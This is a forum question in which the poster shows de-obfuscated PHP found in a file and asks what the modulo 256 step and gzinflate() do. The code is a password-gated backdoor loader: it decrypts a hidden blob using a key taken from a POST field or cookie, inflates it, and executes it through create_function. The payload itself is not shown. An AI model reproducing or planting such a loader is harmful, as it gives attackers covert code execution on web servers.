Issue
I have some PHP code that I've been decrypting (de-obfuscating) for 2 hours. I finally got it converted back into readable code, but I still have some issues understanding the algorithm used here, because of lack of knowledge about some things in the code below.
Code
<?php
$posted = isset($_POST['posted']) ? $_POST['posted'] : (isset($_COOKIE['posted']) ? $_COOKIE['posted'] : NULL);
if ($posted!==NULL) {
$posted= md5($posted) . substr(md5(strrev($posted)), 0, strlen($posted));
for ($counter=0; $counter < 15324; $counter++) {
$idk[$counter] = chr((ord($idk[$counter]) - ord($posted[$counter])) % 256);
$posted.=$idk[$counter];
}
if($idk = @gzinflate($idk)) {
if (isset($_POST['posted']))
@setcookie('posted', $_POST['posted']);
$counter = create_function('', $idk);
unset($idk, $posted);
$counter();
}
}
The $idk
variable is already a value that contains a long string that's being base64 decoded.
What I Don't Understand
I understand almost all of the code, but I don't get what % 256
does in here and also I don't know what gzinflate()
does.